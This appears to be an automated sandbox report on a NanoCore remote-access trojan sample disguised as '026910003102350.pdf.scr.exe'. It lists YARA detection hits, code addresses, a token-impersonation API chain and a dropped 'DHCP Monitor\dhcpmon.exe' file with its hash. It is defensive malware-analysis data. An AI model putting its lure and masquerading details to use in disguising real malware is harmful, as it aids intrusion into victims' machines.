      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects NanoCore Author: ditekSHen
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects NanoCore Author: ditekSHen
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: initial sample | Static PE information: Filename: 026910003102350.pdf.scr.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CC848E
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CD6CDC
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CC40FE
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CD4088
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CD00B7
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CE51C9
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CD7153
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CD62CA
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CC32F7
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CD43BF
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CED440
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CCF461
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CCC426
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CD77EF
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CED8EE
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CC286B
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CF19F4
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CCE9B7
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CD3E0B
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CCEFE2
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Code function: 0_2_00CE4F9A
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00338037
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00332007
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_0032E0BE
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_0031E1A0
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_0031225D
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_0034A28E
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_003322C2
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_0032C59E
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_0039C7A3
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_0034E89F
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_0038291A
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00346AFB
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00378B27
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_0033CE30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00347169
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_003A51D2
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00319240
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00319499
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00331724
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00331A96
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00319B60
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00337BAB
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00331D40
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00337DDA
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00371A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe | Section loaded: dxgidebug.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sfc.dll
      Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
      Source: 026910003102350.pdf.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
